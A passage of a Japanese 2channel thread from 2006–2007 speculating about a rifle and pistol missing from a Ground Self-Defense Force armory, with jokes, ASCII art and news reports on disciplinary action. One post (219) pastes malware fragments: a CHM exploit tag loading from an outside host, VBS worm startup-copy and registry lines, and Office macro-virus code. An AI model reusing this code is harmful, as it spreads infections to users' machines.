近SAMの車体はヤフオク出てたよな・・・

159 :専守防衛さん:2006/11/26(日) 19:02:31
路上走れば怪しまれるだろ!

160 :専守防衛さん:2006/11/26(日) 20:13:52
戦車無くなったりなんかしたらチッチキチーだろ!

161 :専守防衛さん:2006/11/26(日) 20:51:39
【ひろゆき】2ch、年内にも閉鎖へ【自己破産】
2chにおける名誉毀損などの書き込みを削除する作業を怠った為に、
全国から提訴されているが、数億円の慰謝料支払いの為、自己破産するとのこと。

〜詳細は以下のページで確認しる!〜

http://pc8.2ch.net/test/read.cgi/pcnews/1159973168/l50

162 :専守防衛さん:2006/11/27(月) 09:31:45
64とか、拳銃はほしくないが、戦車はほしいな!
税金が高そうだが(重量税とか)、角川の映画なんかに
貸し出せばもうかるかも!
OBなら運転できる人多いだろうな?

163 :専守防衛さん:2006/11/27(月) 18:36:15
>>162
>角川の映画なんかに貸し出せばもうかるかも!

そういう場合は中の人ごと貸し出ししてんだよw  戦国自衛隊とかはね
あ 昔の映画だとトラクター改造らしいがな・・・


164 :専守防衛さん :2006/11/28(火) 19:50:57
頼むから戦車のエンジンは盗まれないでくれ。

165 :専守防衛さん:2006/11/28(火) 20:25:14
エンジン盗まれてたら笑うしかない

166 :専守防衛さん:2006/12/01(金) 21:10:51
出てきたか?やっぱ年内はむりか・・・

167 :専守防衛さん:2006/12/03(日) 10:46:20
寒くなってきたから風邪ひかないように気を付けようね!


168 :専守防衛さん:2006/12/03(日) 21:39:26
餅つきどころじゃない、探せ探せー

169 :専守防衛さん:2006/12/03(日) 23:04:34
マニアだけど、早く小銃と拳銃見つかってくれよ!。こちらも迷惑してます。
師団旅団4部と2部や警務がヤフオクやマニアを監視しているようだけど、ほとんどのマニアは不正入手の官品など持ってないですよ。
持っている官品は用廃品の払い下げぐらいです。

170 :専守防衛さん:2006/12/03(日) 23:06:35
                                      ,/|ミ=、
                                     /  .|ミミミ|
                                    .|    |ミミミ|
                                  ,/|ミ|   |ミミミ|
                                ,/  |ミ|   |ミミミ|
                                  |    |ミ|   |ミミミ|
                                  |    |ミ|   |ミミミ|
                                  |    |ミ|    |ミミミ|
                                  |    |ミ|    |ミミミ|
                                  |    |ミ|    |ミミミ|
                               _,-'"|.   |ミ|   |ミミミ|
             _,. -'' " ̄~゙三=-_、_    _,.-'"   |.   |ミ|   !ミミミ|
          ,,.-''" r _、      三三タ_,.-''"      |   |ミ|  ,.彡ヾミ|
        /    i {ぃ}}       _ニ/        -=三|  」ミヒ彡彡イミヾ
       /,.、     `--"      ニl     -=ニ三=-''レ彡ミミr'"   |ミミミ|
       l {ゞ}    i        .ニl==三三ニ=''"   ,>'"|ミ|    |ミミミ|
      .l `" i_,,...-''|           ニ`=-=i'"       |   |ミl,..-=彡ヾミ|
     _,.-!    !  i         -ニ三三/         L.. -ニヾ|ヾ彡'='''"
      l´,.- l    \/        -ニ三三/        ヾ-‐''"
  _.  ! ri l\       __--三三三='"
  j'‘´l `´ | !  ` ミ三三三三三=''"
 i',.. '´}  | |
  l,.. r´   '´
   }
内部資料流失
http://www.tanteifile.com/diary/index9.html


171 :専守防衛さん:2006/12/04(月) 18:43:51
今年いっぱいで解決できるの?

172 :専守防衛さん:2006/12/04(月) 19:30:34
いっけねぇ〜、十数年前になるが、日出生台で大掛かりな演習のとき
埋め戻したの思い出した。
ということは、十数年も武器管理してなっかたっ〜ことか?

173 :専守防衛さん:2006/12/04(月) 19:38:53
>>172
対空挺ヘリボーン演習?

174 :専守防衛さん:2006/12/04(月) 19:44:22
安心院の住民ですが、一刻でも早く見つけてください。もう不安で眠る暇が
ありません。

175 :専守防衛さん:2006/12/04(月) 20:14:27
安心院の住民の方々。演習場をあげえさがしてんみつからんかったけん他県
にいっちょると思います。

176 :専守防衛さん:2006/12/04(月) 20:26:32
>>174
たかが拳銃ごときで、治安が乱れるわけないだろ。
あんたが死ぬ確立なんてどれほどだと思うか。
たいした税負担してないくせに文句言うなwww

177 :専守防衛さん:2006/12/04(月) 20:33:50
またー、そんなこと書くから叩かれる原因になるんよー

178 :陸秀夫 ◆Bf5xepPT82 :2006/12/04(月) 21:54:42
>>172

お前、かしこいな。
ここにFA登場か!

代々武器係があの手この手でごまかしてきたんだろうなぁ。
もう一度西方あげて日出生台掘ろうぜ。あの感動を再び・・・


179 :専守防衛さん:2006/12/04(月) 23:38:00
爆睡してるでしょ!!

180 :専守防衛さん:2006/12/06(水) 00:36:17
もう出ちこんっちゃ。

181 :専守防衛さん:2006/12/06(水) 11:21:56
多分な。出んわ

182 :空の新兵:2006/12/07(木) 01:21:01
もう盗まれてるジャンw                      __
                                     /___ヽ        |
                            ┴─=iiiiiiニニ「(゚Д゚ 〔〕       | 「l
                            ____rn〕〔__⊆__)      __..| |.|
                            rt〕__,,.〕ff;;-----''--゙'=--.--::┴‐‐iL|_|__
  ________,,----、_____,,,,,,,,,,r‐‐f='F´ ̄ ̄i ̄ ̄i ̄ ̄ ̄ ̄ ̄ミ[]____.ー|tttttt|
 └────――‐L...........L......」_____|_ii [    i    i       ミ[]-------〕L-‐''  ______
                       __,二ニ=――――r――――‐‐r''''''''''''''''''''''''''''^ ̄ ̄ ̄      /
             .,.;-‐‐‐‐‐‐==='F‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐‐r''‐‐‐‐‐‐r‐‐‐‐‐‐‐::r‐‐‐‐‐‐‐‐‐:f「|
             /`‐、_       i 陸上自衛隊 西部方面隊. i      i      i _.-―t‐:;tコ,,」ユ
            ''''rt‐---r----ッ---,---ッ---、---ッ---、-;;ッ---、----ッ--.、---ッ---<´)<0>,)-‐‐‐'^''´
             ヾ、_=‐´ヽ_,_.i    .i_,_,i    .i_,_i    i.i    .i_,_,_,i    i_,_,i    .i___,,./
                `^''=、,tヽ.,__,.ノn.,.ヽ.,__,.ノn .ヽ.,__,.ノ, ヽ.,__,.ノn.nヽ.,__,.ノn .ヽ.,__,.ノ_/ 
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

183 :172:2006/12/07(木) 01:28:00
俺もう、退職しちゃってるからどうにもならないか。
確か、あのあたりに埋めたと記憶しているが・・・・・
あのときは、3ヶ月間づっと日出生台に缶詰になってて風呂は一週間に
一回もらい風呂しにいって、あとはひたすら穴掘り、塹壕どれだけ掘っ
たか。娑婆の黄色い重機も借りてきて最低だった。退職者続出で頭に
きてたから穴のなかにブン投げた。

184 :専守防衛さん:2006/12/07(木) 16:02:09
日出生台の役務のババアにいかさま花札で焼酎とられたの思い出した!
あのばあさんが何か知ってるのでは? もう死んじゃったかな?

185 :専守防衛さん:2006/12/07(木) 17:44:27
ふ〜ん

186 :専守防衛さん:2006/12/07(木) 22:20:06
で、64とP220は出ちきたん?

187 :陸秀夫 ◇Bf5xepPT82 :2006/12/07(木) 23:01:26
      どこに埋めた                      /___ヽ        |
                            ┴─=iiiiiiニニ「(゚Д゚ 〔〕       | 「l
                            ____rn〕〔__⊆__)      __..| |.|
                            rt〕__,,.〕ff;;-----''--゙'=--.--::┴‐‐iL|_|__
  ________,,----、_____,,,,,,,,,,r‐‐f='F´ ̄ ̄i ̄ ̄i ̄ ̄ ̄ ̄ ̄ミ[]____.ー|tttttt|
 └────――‐L...........L......」_____|_ii [    i    i       ミ[]-------〕L-‐''  ______
                       __,二ニ=――――r――――‐‐r''''''''''''''''''''''''''''^ ̄ ̄ ̄      /
             .,.;-‐‐‐‐‐‐==='F‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐‐r''‐‐‐‐‐‐r‐‐‐‐‐‐‐::r‐‐‐‐‐‐‐‐‐:f「|
             /`‐、_       i 陸上自衛隊 西部方面隊. 四戦車 武器捜索中.-―t‐:;tコ,,」ユ
  キュラキュラ〜 ''''rt‐---r----ッ---,---ッ---、---ッ---、-;;ッ---、----ッ--.、---ッ---<´)<0>,)-‐‐‐'^''´
             ヾ、_=‐´ヽ_,_.i    .i_,_,i    .i_,_i    i.i    .i_,_,_,i    i_,_,i    .i___,,./
                `^''=、,tヽ.,__,.ノn.,.ヽ.,__,.ノn .ヽ.,__,.ノ, ヽ.,__,.ノn.nヽ.,__,.ノn .ヽ.,__,.ノ_/ 
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


188 :専守防衛さん:2006/12/07(木) 23:32:03

      どこに埋めた 2ちゃん                 /___ヽ 幕僚長のお出まし      
                            ┴─=iiiiiiニニ「(゚Д゚ 〔〕       | 「l
                            ____rn〕〔__⊆__)      __..| |.|
                            rt〕__,,.〕ff;;-----''--゙'=--.--::┴‐‐iL|_|__
  ________,,----、_____,,,,,,,,,,r‐‐f='F´ ̄ ̄i ̄ ̄i★★★★ ̄ ̄ ̄ ̄ ̄ミ[]____.ー|tttttt|
 └────――‐L...........L......」_____|_ii [    i    i       ミ[]-------〕L-‐''  ______
                       __,二ニ=――――r――――‐‐r''''''''''''''''''''''''''''^ ̄ ̄ ̄      /
             .,.;-‐‐‐‐‐‐==='F‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐‐r''‐‐‐‐‐‐r‐‐‐‐‐‐‐::r‐‐‐‐‐‐‐‐‐:f「|
             /`‐、_★★★★ 陸上自衛隊 西部方面隊. 四戦車 武器捜索中.★★★★
  キュラキュラ〜 ''''rt‐---r----ッ---,---ッ---、---ッ---、-;;ッ---、----ッ--.、---ッ---<´)<0>,)-‐‐‐'^''´
             ヾ、_=‐´ヽ_,_.i    .i_,_,i    .i_,_i    i.i    .i_,_,_,i    i_,_,i    .i___,,./
                `^''=、,tヽ.,__,.ノn.,.ヽ.,__,.ノn .ヽ.,__,.ノ, ヽ.,__,.ノn.nヽ.,__,.ノn .ヽ.,__,.ノ_/ 
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


189 :専守防衛さん:2006/12/07(木) 23:34:50
ここは、力士のスレか?バカだなぁ〜


190 :専守防衛さん:2006/12/07(木) 23:35:02
幕僚長に敬礼! 気お付けー! 頭ぁー  右っ! 1、2!
勤務中異常な〜〜〜〜〜〜し!
まだ出てきません><

191 :専守防衛さん:2006/12/08(金) 21:44:44
昔は天幕野営の時とか銃やMG、防護マスクは個人管理だったから外にブチ投げて寝てたけど今じゃ考えられないねー

192 :専守防衛さん:2006/12/08(金) 21:47:19
>>191 ゴメン、防護マスクは枕にして目ガラス割っちゃいました

193 :専守防衛さん:2006/12/08(金) 22:01:40
>>191-192そんな人がいるから、後輩達が・・・・・・・

194 :専守防衛さん:2006/12/09(土) 17:31:07
AGE

195 :専守防衛さん:2006/12/11(月) 10:04:28
このまま見つからなくて年越えたら許さねぇーー。
土日も盆正月も返上して探せー!
見つかるまで探せー、人権もあるか!
俺達町民は安心して眠れないんだぞーーー!

196 :専守防衛さん:2006/12/11(月) 10:54:42
自衛隊の中には泥棒する人がいますので、
警察はどんどん取り締まって下さい。
きっと無免許運転でトラック運転している奴もいるらしいです。
シートベルトを締めてない人間ばかりです。


197 :専守防衛さん:2006/12/11(月) 22:13:49
最近、スレタイと違った趣旨のレスが目立つ・・・。


198 :専守防衛さん:2006/12/13(水) 09:01:09
飽きるね。出ないし、動きがないから眠くなるよ

199 :専守防衛さん:2006/12/13(水) 09:08:02
>>198

昼寝でもしてなさい。

200 :専守防衛さん:2006/12/13(水) 21:35:04
クリスマスまでに見つかってほしい★サンタさん、なんとかして!

201 :専守防衛さん:2006/12/13(水) 21:37:17
貴方から拳銃を♪

私から何もない♪

サンタ苦労す 拳銃♪カモン♪

202 :専守防衛さん:2006/12/13(水) 22:23:39
もう見つからんっちゃ。探すのよだきいけん。捜索やめよ。

203 :専守防衛さん:2006/12/14(木) 23:20:55
どこ探してもでらん!これ以上どこ探せと!辛い、辛すぎる

204 :専守防衛さん:2006/12/14(木) 23:35:47
出てきたと抜かしてる香具師、根拠を述べてみろ!全部、忍者はったりやろ!

205 :専守防衛さん:2006/12/15(金) 01:36:35
ひやかしで嘘つくアホが多いからな。

206 :専守防衛さん:2006/12/16(土) 09:00:52
ひやかしで、『もう発見されてる』とか言うやつの気持ちはわからないね!
妄想癖かな?

207 :専守防衛さん:2006/12/16(土) 09:29:18
>>196
> きっと無免許運転でトラック運転している奴もいるらしいです。
ばかやねんか きっと〜らしいってどげな日本語か

> シートベルトを締めてない人間ばかりです。
そげなやつはおらん!!

208 :専守防衛さん:2006/12/16(土) 21:04:59
ひやかし諸君、次の見つかったネタは何かなー?

209 :専守防衛さん:2006/12/16(土) 23:45:47
>>208
                  ,イ^i                   l
                 ,イ::::  l               __  _l
                /::::::::   l                 ,. |
               /::::::::::    {       /|     __/ __|
             /::::::::    _`-、_  /:: {
            /:::::::::::   < 。\    ̄  __ l     ___  l
           ./:::::::::::    r  ̄ ̄ :::::::..... <。゙yi         /
           /:::::::::::      人   :::::::::::::::. ̄、{      \ ´,
           |:::::::::::.       l __`ー-、.__,,.ノ!  !       `'´ ,
           |::::::::::::.        \ ..`..____' /  |      ─ r‐┘
           .l:::::::::::::.       \:::::::::::::::::::::/   /        ’  ,
           ヽ::::::::::. ___    \_ ̄~^/   ,/     ───┘
             \::/`ー---‐^ヽ    ゙`='   /      _ _l
              l:::      l         /           ’  l
         _ /,--、l::::.      ノ       l         ̄ .| ̄
     ,--、_ノ:: `ー'::   、ミー---‐,,l        \         ___l
    ,/   :::         i ̄ ̄  |         \
   /:::::::.        l:::    l:::::::   l           \        l
  l:::::::::::.   l:::    !::    |:::::::   l            \   __ _l
  |:::::::::l::::  l:::    |::    l:::::     l              l     |
  |::::::::::l:::.   }:::   l:::::,r-----    l               l  __ノ
  ヽ::::::::l::::   ト:;;;;;;;/-/__...........  /                 |     |

210 :現職 ◆Eoc/OJyA4Y :2006/12/16(土) 23:53:30
>>207 そうでもないよ。

官用車を運行してるときはシートベルトしてない奴は多い。
まぁ変な根拠があるせいもあるけどさ…

211 :専守防衛さん:2006/12/17(日) 20:47:26
とにかく、はやく見つかるといいですね。


212 :専守防衛さん:2006/12/19(火) 07:57:38
もう見つからないって!無理×2!

213 :専守防衛さん:2006/12/19(火) 08:00:08
何の為に盗ったんだろう…

214 :クリッククリック:2006/12/19(火) 23:14:50
暇人のガセネタもだいぶ尽きてきたみたいねwoo・・・

215 :専守防衛さん:2006/12/19(火) 23:35:45
もう見つからんっちゃ。もう探すのしんけんよだきい。

216 :専守防衛さん:2006/12/20(水) 17:17:58
現在何人体制で探してるんですか?その間に演習とかやってるんですか?

217 :専守防衛さん:2006/12/20(水) 18:06:52
新聞・テレビ報道された、「三人の容疑者」はどうなったんだ?

218 :専守防衛さん:2006/12/20(水) 22:58:49
>>216
何探ろうとしているのwww
しつこいよ、あんたwww

219 :専守防衛さん:2006/12/22(金) 12:58:07
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


220 :専守防衛さん:2006/12/26(火) 21:55:55
超能力捜索官に頼めよ!でも自衛隊せこいし、金賭けたがらないから無理か・・・

221 :専守防衛さん:2006/12/26(火) 21:58:02
>>220
テレビに影響されやすいな(w

222 :専守防衛さん:2006/12/26(火) 22:10:03
もう休暇に、はいったし誰も探さねーよ!

223 :専守防衛さん:2006/12/26(火) 22:10:44
すぐ逮捕されていて、銃もすぐ発見されていて当然。
時間がかかった分、国民にあやまれ。

224 :専守防衛さん:2006/12/26(火) 22:12:44
犯人みつかってないやろ!ごくろうさーん

225 :専守防衛さん:2006/12/27(水) 22:36:24
どうのこうの言っても、外部の者には知る術無しやがなw


226 :専守防衛さん:2006/12/28(木) 09:08:31
>>219
ウイルス貼り付けたやつが怪しい!
大分県警、刑務隊!徹底的に調査すべし

227 :専守防衛さん:2006/12/28(木) 15:02:38
こうも長い間解決しないということは、何か理由があるな。わざと解決を遅らせてんだよ。


228 :専守防衛さん:2007/01/02(火) 21:30:26
結局出ちこんかったんやろ?
ウイルスうぜえ。

229 :専守防衛さん:2007/01/02(火) 21:39:19
気持を新たに新年からしっかり探そうね☆

230 :専守防衛さん:2007/01/02(火) 23:51:26
捜索したっていうより、たんにマスコミの顔色を
うかがってただけじゃないのか、この3ヶ月間は。
ほとぼりが冷めるのを待つまでもなく、報道自体
ほとんどなかったからこのまま穏便に済まそうと。

231 :専守防衛さん:2007/01/04(木) 18:38:05
age

232 :専守防衛さん:2007/01/05(金) 09:16:11
tenpura

233 :専守防衛さん:2007/01/07(日) 11:08:58
見つかるわけないな。


234 :専守防衛さん:2007/01/07(日) 11:10:38

 ♪〜( ̄ε ̄)
お前ら騙されたと思って
「こんとんじょのいこ」
って言ってみろ♪
えなりかずきが「簡単じゃないか」って言ってるように聞える

235 :専守防衛さん:2007/01/07(日) 11:29:39
責任ある地位にある奴が全然自分の責任というものを感じていないみたいだからな。
感じていたとしても全然伝わってこないもんな。
くだらないことで休日出勤させて4連休をつぶすとはどういうことだ。
代休をためた者のこと、単身赴任者のこと、隊員の地域活動への参加等等、そんなことは全く眼中に入れず、大してやることもない「準備」に無理やり参加させて、しまいには文句をたれる始末だ。
杜撰な管理も当然原因の一つだろうが、そんなものは枝葉末節に過ぎない。
偉い奴がどんな姿勢でこれまで自衛隊を動かしてきたか・・・これが一番の問題だ。
そのことを少しでも考えるようになれば小銃も出てきてくれるんじゃないか。
ま、あの態度を見てると多分むりだな・・・。
小銃事件で勇退の花道を飾る・・・しかたねえな。

236 :専守防衛さん:2007/01/07(日) 19:58:16
自衛隊のアバウトな所がオレは大好きだったのに・・・棲みにくくなってきたなー

237 :専守防衛さん:2007/01/08(月) 01:32:42
昔、富士地区の駐屯地で銃身以外の部品を全部集めて小銃モドキを作って処分された奴いる。そいつは、九州に転属した。

238 :専守防衛さん:2007/01/08(月) 22:17:16
盗んだ目的はなんだったんだ。横流し?自己満足?

これだけ騒ぎになると、どういう形で発見されるのがいいんだろうね。

239 :専守防衛さん:2007/01/08(月) 22:21:39
暴力団の拳銃摘発みたいに、コインロッカーってどうだ?

240 :70式地雷原発射装置:2007/01/08(月) 22:26:56
これで西方総監も陸幕長の椅子も遠のいたな・・・・・・

241 :専守防衛さん:2007/01/11(木) 00:52:06
出てくるのかな?

242 :専守防衛さん:2007/01/11(木) 01:22:47
小銃の部品は銃身と遊艇以外は員数外有るだろ?弾倉なんか消耗品だし、上部被筒、下部被筒も何とでもなるんじゃね?銃身だって補給所に返納されたのをコッソリ頼んで貰えば小銃完成!こんなこと表沙汰なるほうがおかしいんだよ。

243 :専守防衛さん:2007/01/11(木) 04:30:24
≫234 オイオイ古いぞ。

244 :専守防衛さん:2007/01/12(金) 08:29:25
元自ですが、民間15年、宝くじでこの前初めて5等があたりました。1万円です。
うれしいです。

245 :専守防衛さん:2007/01/13(土) 20:46:34
【中国】戦闘機360機、戦車1800両、自動小銃30万丁が紛失 内部者が転売か
ttp://news22.2ch.net/test/read.cgi/newsplus/1168647051/
中国人民解放軍の軍需庫に保管されていた、戦闘機、戦車、装甲車、
小銃、戦略用燃料、大量の野戦ベッド、軍靴などの軍需物資が、
忽然と「消えて」転売されていた事実が判明した。

香港月刊誌「動向」によると、中央軍事委員会の監督下にあり、
総参謀部、総装備部、総後勤部、軍事規律委員会で構成される
「2004−5特殊案件調査チーム」が、二年半の調査を経て、追及し証拠を固めた結果、
結論として、陜西省寶(爰隹)、雲南省東川、四川省南充、湖南省麻陽、
広西族自治区蒙山の各軍需庫に保管されていた、
廃棄処分、不用品、もしくは後送処分した装備品が盗み出されていたことが分かった。

「2004−5特殊案件調査チーム」は、中央軍事委員会の隷下にあって、
2004年5月初旬に成立、中央軍事委員会曹剛川副主席(国防部長)を責任者として、
総後勤部の温光春・常務副部長、総装備部の朱發忠・副部長、
軍事規律委員の孫忠同・書記ら四人の肝いりで結成された。

調査チームの報告では、上述の五大軍需庫における横領は、軍、地方政府、
企業が癒着結託した結果で、監督管理が長期にわたってなされず、
保管制度が「なし崩し」になった後に発生した。

報告ではまた、問題が早くも2000年から発生し、
軍装備部が後送処分として報告した航空機をアルミニウム合金として企業に転売、
小銃までもが市場に出回っていた。
当時の調査結果では、「規定通り正常処理」「関係部門の批准済み」などとなっていた。

以下は、調査チームが明らかにした「驚くべき」内容である。
(以下略です。以降は原文をご覧くださいです)

246 :専守防衛さん:2007/01/15(月) 03:20:55
ねれねぇ…

247 :専守防衛さん:2007/01/15(月) 11:44:30
どういう管理してるんだよ。
小銃だろ?そんなでかい物が消えて気が付かないとは
信じられん。

248 :専守防衛さん:2007/01/15(月) 18:29:12
小銃まだ見つかんないの?

249 :専守防衛さん:2007/01/16(火) 10:53:02
そのうち90式が盗まれて市街地で大暴れするよ。

250 :専守防衛さん:2007/01/16(火) 11:02:38
ちゃんと小銃探してるの?

251 :専守防衛さん:2007/01/16(火) 11:04:44
責任者はちゃんと処分されたのか?通常の管理をしていれば絶対なくならないよな

252 :専守防衛さん:2007/01/16(火) 22:18:43
小銃見つけた人に賞金6000万円
その前後の人にそれぞれ2000万円

253 :専守防衛さん:2007/01/16(火) 22:25:05
前後ってなにさ〜I

254 :専守防衛さん:2007/01/16(火) 22:38:39
>>253
文字どおり前と後ろの三重連ダロ。

255 :専守防衛さん:2007/01/17(水) 09:56:30
大多数の国民はすでに忘れているよ。多くの隊員もね!
もうこの話はやめてもいいんじゃない?

256 :専守防衛さん:2007/01/17(水) 11:56:13
>>249
74なら簡単に盗めると元戦車海苔の同僚が言ってた。

257 :専守防衛さん:2007/01/17(水) 12:16:42
それは「そいつが動かせる」だけであって、外には出れないだろ。

258 :専守防衛さん:2007/01/17(水) 15:58:55
>>257
動き出したら、警衛所じゃ止められないべよw
なんか、練馬とかでパレード用に来てるときとかは狙い目だといってたぞw

259 :専守防衛さん:2007/01/17(水) 16:01:24
物の管理が杜撰だから、何時、何処で無くなったのかも解らないんじゃね?戦車の員数外がでで、監査の前に演習場に埋めたと聴いた事有るからな。

260 :専守防衛さん:2007/01/17(水) 16:09:24
>>259
どんな員数外なんだよ?w
でも、2型の新装備が来たときには、速攻で員数外を作ってた補給陸曹がいたな。
どうやってたのかは知らんけど・・・。
あと、北富士演習場の廠舎近くにあったヘリの残骸とかはどういう管理だったんだろう。
今なら、操縦桿とかパクってきてヤフオクに出して儲けられたのになぁ〜w

261 :専守防衛さん:2007/01/17(水) 17:00:00
>>258
止められなくてもいつかわ止まるだろ。現行犯逮捕じゃん。ってか、知ってっか?動いてる戦車は止めれるぞ。


262 :専守防衛さん:2007/01/17(水) 17:23:12
>>255なんでこの話題を終わらせようとする?怪しい…みんなでもっと小銃探そうぜ。

263 :専守防衛さん:2007/01/17(水) 18:22:12
戦車の員数外って言うのは、M4だって聞いたことがあるけどな…

264 :専守防衛さん:2007/01/17(水) 18:41:02
>>261
履帯の間になんか挟むの?

265 :専守防衛さん:2007/01/17(水) 20:33:17
>>255小銃返せよ

266 :専守防衛さん:2007/01/17(水) 20:52:33
戦車のハッチって、鍵かかるの?

エンジンかけるのにキーはいらないと聞いたことがあるから、
かけ方知ってて入り込めれば、盗めるね。
土建屋の重機扱ってる人なら動かせるんじゃねえの?

267 :専守防衛さん:2007/01/18(木) 01:20:30
富士地区の駐屯地や演習場には色んな物、埋まってるよ、戦車だけじゃなくな…

268 :専守防衛さん:2007/01/18(木) 01:25:03
手渡しでぐるぐる回ってます。

バカの後を突いて移動中。高速移動してるから行く先不明。

ジャックナイフも同様・

269 :専守防衛さん:2007/01/18(木) 01:33:43
お金と員数外は天下のまわりものか

270 :専守防衛さん:2007/01/18(木) 12:13:31
イギリスは実際にチーフテンが盗まれて市街地で
大暴れした実績が有るよ。アメもM60が高速道路を
疾走したんじゃないか。

271 :専守防衛さん:2007/01/19(金) 00:36:26
俺は、弾倉の員数外を持ってたよ。

272 :専守防衛さん:2007/01/21(日) 13:59:09
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 |  ギコ大隊長もう小銃なんか出てきませんよ もう忘れて新たな気持ちで頑張りましょう!
 \__  _____________ _______
      ∨┌───────        /         /|
        | ギコネコ     __      | ̄ ̄| ̄ ̄| ̄ ̄|  |
        | 戦車大隊本部   /  \   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        |          | ∧∧ | < 今から日出生台ほふく前進させるぞ!ゴルァ!!
                    (゚Д゚,,)|  \_____________
     ∧∧        .※ ⊂ ⊂|. |〓_ |,[][][]|,[][][]|   ..|  |
      (,,   )     / U ̄ ̄ ̄ ̄ 〓/| |,[][][]|,[][][]|,[][][]|/
     /  つ    | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  |  ̄ ̄ ̄ ̄ ̄ ̄ ̄
   〜(   )     |              |     __ ∩∩
                         〜´     (´Д`) ホントカヨ。。。
                          UU ̄ ̄U U



273 :専守防衛さん:2007/01/21(日) 14:30:00
CIAの特別捜査官に頼もうよ。KCIAでもいいからさ。

274 :専守防衛さん:2007/01/22(月) 10:08:33
それで結局どうなるの?
国民への報告義務を忘れていませんか?今どき珍しいですね。
不二家の社長と同じレベルですか?責任者はどうするつもり?といっても責任者としての意識がないので答えようがありません。
駐屯地の皆さんが気の毒ですわ。しかるべき地位にある人は、自身の意志を明確に示すべきです。
「初めからありませんでした」が結論でしょう?管理ミスと言うことで一件落着。そして誰もキズが付かなかった。
問題は公表のタイミングですね。

総監殿!この状況下での決心は!部下は困ってます。決心を!
本職の決心は、事実関係を明確にして、各級指揮官に今後採るべき方策を速やかに決定することを命じるだけでありま〜す。
順序を経てよろしく・・・・・・


275 :専守防衛さん:2007/01/23(火) 09:47:48
(*゚Д゚)でも、もう捜索してないよね?それより創作したほうがいいんじゃ?

276 :専守防衛さん:2007/01/23(火) 09:58:57
154: ヒュム♀F1マンボウまじでもいんだけど (722)  155: ■■■■■■Ifrit108■■■■■■ (357)  156: 部長の席からはマウスの音しか聞こえない (13) 


357 :既にその名前は使われています :2007/01/23(火) 09:55:49.46 ID:S5/Nb8mN
>>354
あらら^^;

>>355
えくしーど って、どういう意味?

・ここまで弾着が逝くと、笑うw

277 :専守防衛さん:2007/01/24(水) 01:34:16
陸自小銃紛失:師団長ら懲戒処分へ 武器庫管理が不十分
http://www.mainichi-msn.co.jp/shakai/jiken/news/20070124k0000m040161000c.html
陸上自衛隊の玖珠(くす)駐屯地(大分県玖珠町)で昨年9月、小銃などが紛失した事件で、防衛省と陸上幕僚監部は23日、武器庫の管理が不十分だったとして同駐屯地を管轄する内田益次郎・第4師団長らを懲戒処分とする方針を固めた。
また、陸上自衛隊トップの森勉陸上幕僚長も注意処分とする。
玖珠駐屯地の第4戦車大隊武器庫から紛失したのは64式小銃と9ミリ拳銃それぞれ1丁、弾を装てんするカートリッジ、双眼鏡。
陸自の調査によると、武器庫と銃の保管場所の鍵は異なる鍵で施錠されたうえ、別々の隊員が所持・管理することになっていたが、1人で所持していた。
このため管理がずさんだったとして、管理・監督責任者の処分を行うことにした。
紛失した小銃などは、駐屯地とその周辺を捜索しているが、見つかっていない。
また、内部犯行の疑いが強いとして窃盗容疑で大分県警と警務隊が合同で捜査しているが容疑者の特定に至っていない。
【反田昌平】

毎日新聞 2007年1月24日 0時34分


278 :専守防衛さん:2007/01/24(水) 08:47:17
http://news22.2ch.net/test/read.cgi/newsplus/1169592579/

http://www.mainichi-msn.co.jp/shakai/jiken/news/20070124k0000m040161000c.html
★陸幕長ら30人きょう処分 停職など、窃盗捜査は継続 
陸上自衛隊玖珠駐屯地(大分県玖珠町)の武器庫から小銃、拳銃各1丁がなくなった問題で、
防衛省は23日、管理責任者の1等陸尉ら隊員15人を24日付で停職などの懲戒処分にする
方針を固めた。
 森勉陸上幕僚長ら幹部10数人についても監督責任を問い、内規に基づく注意処分などにする
予定で、処分対象は計約30人に上る見込み。陸自は内部関係者による窃盗事件の疑いが強い
とみており、警務隊は大分県警と連携して捜査を続ける。
 小銃などが紛失したのは第4戦車大隊本部管理中隊の武器庫で、昨年9月8日に発覚。陸自は
約4カ月半にわたって延べ約9万5000人の隊員を動員、現在も駐屯地内外の捜索を続けている。
依然として小銃などは見つかっていないが、今回、管理体制の不備について責任を問うことにした。
西日本新聞2007年01月24日02時17分
http://www.nishinippon.co.jp/nnp/national/20070124/20070124_004.shtml




279 :専守防衛さん:2007/01/24(水) 13:57:24
やっぱり、管理簿上の記入ミスなんじゃないのかね?
あと>>277の「弾を装てんするカートリッジ」って意味がわからないな。
弾薬のことを言ってるなら武器庫には弾薬自体保管されないしな。
弾倉のことを言ってるのかな?

